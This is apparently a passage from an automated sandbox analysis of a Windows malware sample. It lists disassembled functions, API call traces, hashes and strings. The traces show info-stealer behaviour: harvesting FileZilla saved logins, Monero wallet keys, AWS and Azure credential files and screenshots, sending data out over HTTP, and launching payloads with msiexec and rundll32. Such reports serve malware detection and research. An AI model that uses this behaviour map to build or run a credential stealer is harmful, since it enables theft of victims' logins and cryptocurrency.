                      • Opcode ID: 110aece7e27fe408f2eea11fc9b139dcf5647f68ce94831dabcfcc7fe1083d5a
                      • Instruction ID: 21edc8ee46dbcc6a1b2402a122d29241abba85c49f40eaca4e535fa34fb66e76
                      • Opcode Fuzzy Hash: 110aece7e27fe408f2eea11fc9b139dcf5647f68ce94831dabcfcc7fe1083d5a
                      • Instruction Fuzzy Hash: CE11847184410DFBEB25EBA0DC599ED7378EF10300F4146A9E51A56093EF382B4ACB92
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '@z
                      • API String ID: 0-1379757296
                      • Opcode ID: b802ee742f54fd9361cc0d01c42d01d41d8531931d9906c427a7407087e64662
                      • Instruction ID: b1ff4499cce856ea0c5c33f928424634d871e82bb4f80ebc0ce259fcb6edf688
                      • Opcode Fuzzy Hash: b802ee742f54fd9361cc0d01c42d01d41d8531931d9906c427a7407087e64662
                      • Instruction Fuzzy Hash: C3812AF3E086144FF300AA79DC8476ABAD7EBD4760F1A863DDAC447784ED7918058682
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: Jm~_
                      • API String ID: 0-3750373163
                      • Opcode ID: d5686b813c9d25f15be2dbb4d8a80e61a5a9f6e1d970a29fd99ca7d7f615ca54
                      • Instruction ID: 947962fde4a0731874ada8186f1b798fd3c1ea9c233845c790f4abe194e03067
                      • Opcode Fuzzy Hash: d5686b813c9d25f15be2dbb4d8a80e61a5a9f6e1d970a29fd99ca7d7f615ca54
                      • Instruction Fuzzy Hash: CE611AF360D2105FE30C9E29EC9167AB7DAEBD4320F26863EE6C5C3784E9755C018696
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      • Associated: 00000000.00000002.2169976541.0000000000730000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007E1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.00000000007ED000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.0000000000812000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2169991722.000000000097A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000BF1000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C15000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170153838.0000000000C2B000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170420150.0000000000C2C000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170581218.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2170595890.0000000000DCB000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: nn:<
                      • API String ID: 0-2989628408
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.000000000098E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Memory Dump Source
                      • Source File: 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007399EC
                        • Part of subcall function 007399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00739A11
                        • Part of subcall function 007399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00739A31
                        • Part of subcall function 007399C0: ReadFile.KERNEL32(000000FF,?,00000000,0073148F,00000000), ref: 00739A5A
                        • Part of subcall function 007399C0: LocalFree.KERNEL32(0073148F), ref: 00739A90
                        • Part of subcall function 007399C0: CloseHandle.KERNEL32(000000FF), ref: 00739A9A
                        • Part of subcall function 00748E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00748E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00750DBA,00750DB7,00750DB6,00750DB3), ref: 00740362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00740369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00740385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 007403CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 007403DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00740419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00740463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 00740532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00740562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00740571
                      • lstrcat.KERNEL32(?,url: ), ref: 00740580
                      • lstrcat.KERNEL32(?,00000000), ref: 00740593
                      • lstrcat.KERNEL32(?,00751678), ref: 007405A2
                      • lstrcat.KERNEL32(?,00000000), ref: 007405B5
                      • lstrcat.KERNEL32(?,0075167C), ref: 007405C4
                      • lstrcat.KERNEL32(?,login: ), ref: 007405D3
                      • lstrcat.KERNEL32(?,00000000), ref: 007405E6
                      • lstrcat.KERNEL32(?,00751688), ref: 007405F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00740604
                      • lstrcat.KERNEL32(?,00000000), ref: 00740617
                      • lstrcat.KERNEL32(?,00751698), ref: 00740626
                      • lstrcat.KERNEL32(?,0075169C), ref: 00740635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00750DB2), ref: 0074068E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 007359F8
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 00735A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00735B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013EE360,00000000,?,013E9ED8,00000000,?,00751A1C), ref: 00735E71
                      • lstrlen.KERNEL32(00000000), ref: 00735E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00735E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00735E9A
                      • lstrlen.KERNEL32(00000000), ref: 00735EAF
                      • lstrlen.KERNEL32(00000000), ref: 00735ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00735EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00735F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00735F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00735F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00735FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00735FBD
                      • HttpOpenRequestA.WININET(00000000,013EE400,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00735BF8
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • InternetCloseHandle.WININET(00000000), ref: 00735FC7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 00748B60: GetSystemTime.KERNEL32(00750E1A,013E9998,007505AE,?,?,007313F9,?,0000001A,00750E1A,00000000,?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 00748B86
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0073CF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0073D0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0073D0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D208
                      • lstrcat.KERNEL32(?,00751478), ref: 0073D217
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D22A
                      • lstrcat.KERNEL32(?,0075147C), ref: 0073D239
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D24C
                      • lstrcat.KERNEL32(?,00751480), ref: 0073D25B
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D26E
                      • lstrcat.KERNEL32(?,00751484), ref: 0073D27D
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D290
                      • lstrcat.KERNEL32(?,00751488), ref: 0073D29F
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D2B2
                      • lstrcat.KERNEL32(?,0075148C), ref: 0073D2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 0073D2D4
                      • lstrcat.KERNEL32(?,00751490), ref: 0073D2E3
                        • Part of subcall function 0074A820: lstrlen.KERNEL32(00734F05,?,?,00734F05,00750DDE), ref: 0074A82B
                        • Part of subcall function 0074A820: lstrcpy.KERNEL32(00750DDE,00000000), ref: 0074A885
                      • lstrlen.KERNEL32(?), ref: 0073D32A
                      • lstrlen.KERNEL32(?), ref: 0073D339
                        • Part of subcall function 0074AA70: StrCmpCA.SHLWAPI(013E8920,0073A7A7,?,0073A7A7,013E8920), ref: 0074AA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 0073D3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2169991722.0000000000731000.00000040.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_730000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: 00b0459fa4961379b29d4c07e8ddfbd45edb7dcc4d38b9cac136c65c3749d1b5
                      • Instruction ID: 56cb9326eaf07daa83b0e99e6529a9ca9e4780210da69acafca43f75ceab9439
                      • Opcode Fuzzy Hash: 00b0459fa4961379b29d4c07e8ddfbd45edb7dcc4d38b9cac136c65c3749d1b5
                      • Instruction Fuzzy Hash: F2E12D72954108EBEB05EBA0DD9AEEE737CEF54301F104158F106A6092DF39AE49DB62
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 007347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00734839
                        • Part of subcall function 007347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00734849
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00734915
                      • StrCmpCA.SHLWAPI(?,013EE290), ref: 0073493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00734ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00750DDB,00000000,?,?,00000000,?,",00000000,?,013EE2B0), ref: 00734DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00734E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00734E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00734E49
                      • InternetCloseHandle.WININET(00000000), ref: 00734EAD
                      • InternetCloseHandle.WININET(00000000), ref: 00734EC5
                      • HttpOpenRequestA.WININET(00000000,013EE400,?,013EDC28,00000000,00000000,00400100,00000000), ref: 00734B15
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                      • InternetCloseHandle.WININET(00000000), ref: 00734ECF
                      Similarity
                      • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 460715078-2180234286
                      • Opcode ID: 9275aac0c489d804e8132c637fe42ce0f1f7441ace76b889bdb74114f22935c7
                      • Instruction ID: c3bca0b6043f1f2044c4e250e854236ff67cb1ce01e1685f9f8b79488d1efed6
                      • Opcode Fuzzy Hash: 9275aac0c489d804e8132c637fe42ce0f1f7441ace76b889bdb74114f22935c7
                      • Instruction Fuzzy Hash: B712BB72950218FAEB15EB90DC96FEEB378BF54304F5141A9B10662091EF782F49CF62
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                        • Part of subcall function 0074A920: lstrcpy.KERNEL32(00000000,?), ref: 0074A972
                        • Part of subcall function 0074A920: lstrcat.KERNEL32(00000000), ref: 0074A982
                        • Part of subcall function 0074A8A0: lstrcpy.KERNEL32(?,00750E17), ref: 0074A905
                        • Part of subcall function 0074A9B0: lstrlen.KERNEL32(?,013E8B50,?,\Monero\wallet.keys,00750E17), ref: 0074A9C5
                        • Part of subcall function 0074A9B0: lstrcpy.KERNEL32(00000000), ref: 0074AA04
                        • Part of subcall function 0074A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0074AA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013ECFC0,00000000,?,0075144C,00000000,?,?), ref: 0073CA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0073CA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0073CA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0073CAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0073CAD9
                      • StrStrA.SHLWAPI(?,013ECE28,00750B52), ref: 0073CAF7
                      • StrStrA.SHLWAPI(00000000,013ECEB8), ref: 0073CB1E
                      • StrStrA.SHLWAPI(?,013ED6D8,00000000,?,00751458,00000000,?,00000000,00000000,?,013E89A0,00000000,?,00751454,00000000,?), ref: 0073CCA2
                      • StrStrA.SHLWAPI(00000000,013ED798), ref: 0073CCB9
                        • Part of subcall function 0073C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0073C871
                        • Part of subcall function 0073C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0073C87C
                      • StrStrA.SHLWAPI(?,013ED798,00000000,?,0075145C,00000000,?,00000000,013E8910), ref: 0073CD5A
                      • StrStrA.SHLWAPI(00000000,013E8B20), ref: 0073CD71
                        • Part of subcall function 0073C820: lstrcat.KERNEL32(?,00750B46), ref: 0073C943
                        • Part of subcall function 0073C820: lstrcat.KERNEL32(?,00750B47), ref: 0073C957
                        • Part of subcall function 0073C820: lstrcat.KERNEL32(?,00750B4E), ref: 0073C978
                      • lstrlen.KERNEL32(00000000), ref: 0073CE44
                      • CloseHandle.KERNEL32(00000000), ref: 0073CE9C
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: a7c7b35bda7831a47926bc62fb9e8fd46abcf6795233d529ca9841aad043d3d0
                      • Instruction ID: cade60b658811852af1e63d21c2053d69360e946c08a38d19c74dee18c293417
                      • Opcode Fuzzy Hash: a7c7b35bda7831a47926bc62fb9e8fd46abcf6795233d529ca9841aad043d3d0
                      • Instruction Fuzzy Hash: 42E11E72954108FBEB15EBA0DC99FEEB778EF54300F404169F10662191EF386A4ACB62
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • RegOpenKeyExA.ADVAPI32(00000000,013EB160,00000000,00020019,00000000,007505B6), ref: 007483A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00748426
                      • wsprintfA.USER32 ref: 00748459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0074847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0074848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00748499
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: fb6b4c6676bfc46e9673ff111ac3046180afed916b7f4005ae193cebc30deb6a
                      • Instruction ID: 3b00029c7c4c66b0ca4b9ba728dec8e25216cd7ddd447b054598f9f0cd3f42bf
                      • Opcode Fuzzy Hash: fb6b4c6676bfc46e9673ff111ac3046180afed916b7f4005ae193cebc30deb6a
                      • Instruction Fuzzy Hash: CA811AB295411CEBEB68DB54CC95FEEB7B8FB48700F008298E109A6180DF756B85CF91
                      APIs
                        • Part of subcall function 00748DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00748E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00744DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00744DCD
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 0074492C
                        • Part of subcall function 00744910: FindFirstFileA.KERNEL32(?,?), ref: 00744943
                      • lstrcat.KERNEL32(?,00000000), ref: 00744E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00744E59
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FDC), ref: 00744971
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,00750FE0), ref: 00744987
                        • Part of subcall function 00744910: FindNextFileA.KERNEL32(000000FF,?), ref: 00744B7D
                        • Part of subcall function 00744910: FindClose.KERNEL32(000000FF), ref: 00744B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00744EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00744EE5
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449B0
                        • Part of subcall function 00744910: StrCmpCA.SHLWAPI(?,007508D2), ref: 007449C5
                        • Part of subcall function 00744910: wsprintfA.USER32 ref: 007449E2
                        • Part of subcall function 00744910: PathMatchSpecA.SHLWAPI(?,?), ref: 00744A1E
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,013EE310), ref: 00744A4A
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,00750FF8), ref: 00744A5C
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,?), ref: 00744A70
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,00750FFC), ref: 00744A82
                        • Part of subcall function 00744910: lstrcat.KERNEL32(?,?), ref: 00744A96
                        • Part of subcall function 00744910: CopyFileA.KERNEL32(?,?,00000001), ref: 00744AAC
                        • Part of subcall function 00744910: DeleteFileA.KERNEL32(?), ref: 00744B31
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 8ce55d005ffa9005d357dbaf878ae66f6219cd668fa8bfc24d119221ef42fd94
                      • Instruction ID: 1246a9483c87a5517d4c6ce5ead23aa4094c508c25af3acaee9d326f9f120c80
                      • Opcode Fuzzy Hash: 8ce55d005ffa9005d357dbaf878ae66f6219cd668fa8bfc24d119221ef42fd94
                      • Instruction Fuzzy Hash: ED4194BAA54208A7D754F770EC4BFED3338AB64701F404494B649660C2EEF85BCD9B92
                      APIs
                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0074906C
                      Similarity
                      • API ID: CreateGlobalStream
                      • String ID: image/jpeg
                      • API String ID: 2244384528-3785015651
                      • Opcode ID: 3e9e670f9929590dd48c55aa44f74bf69870894802e79c66720c9aa932dad144
                      • Instruction ID: 67da62ca8848b41029d17f28eb471c88b9c6963ad16814e9f0c66d2e59484811
                      • Opcode Fuzzy Hash: 3e9e670f9929590dd48c55aa44f74bf69870894802e79c66720c9aa932dad144
                      • Instruction Fuzzy Hash: BD71E2B2914208EBDB04DFE4DC99FDEB7B9BF88700F108508F615A7290DB78A945DB61
                      APIs
                        • Part of subcall function 0074A740: lstrcpy.KERNEL32(00750E17,00000000), ref: 0074A788
                      • ShellExecuteEx.SHELL32(0000003C), ref: 007431C5
                      • ShellExecuteEx.SHELL32(0000003C), ref: 0074335D
                      • ShellExecuteEx.SHELL32(0000003C), ref: 007434EA
                      Similarity
                      • API ID: ExecuteShell$lstrcpy
                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                      • API String ID: 2507796910-3625054190
                      • Opcode ID: 20bd3e52aaa8424120a207ea98280b5b44538c23b202deebb15cf96535a41016
                      • Instruction ID: c6cbf5cbd1186fff19da2d4ca96103fb293675039461b65d9a86aebdce78d3a9
                      • Opcode Fuzzy Hash: 20bd3e52aaa8424120a207ea98280b5b44538c23b202deebb15cf96535a41016
                      • Instruction Fuzzy Hash: 8E12EE71850108EAEB19FBA0DC96FEDB77CAF14300F504169F50666191EF786B4ACFA2
                      APIs
                        • Part of subcall function 0074A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0074A7E6
                        • Part of subcall function 00736280: InternetOpenA.WININET(00750DFE,00000001,00000000,00000000,00000000), ref: 007362E1
